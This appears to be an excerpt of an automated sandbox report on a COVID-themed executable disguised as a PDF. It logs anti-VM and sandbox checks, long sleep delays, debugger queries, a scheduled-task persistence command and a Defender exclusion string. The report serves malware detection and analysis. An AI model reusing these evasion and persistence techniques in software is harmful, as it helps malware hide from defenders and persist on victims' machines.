                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5700Thread sleep time: -42124s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 3164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5224Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 42124Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeThread delayed: delay time: 60000Jump to behavior
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228699626.0000000006C9C000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:ringFileInfo
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]6_2_0040317B
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap,6_2_00402B7C
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'Jump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
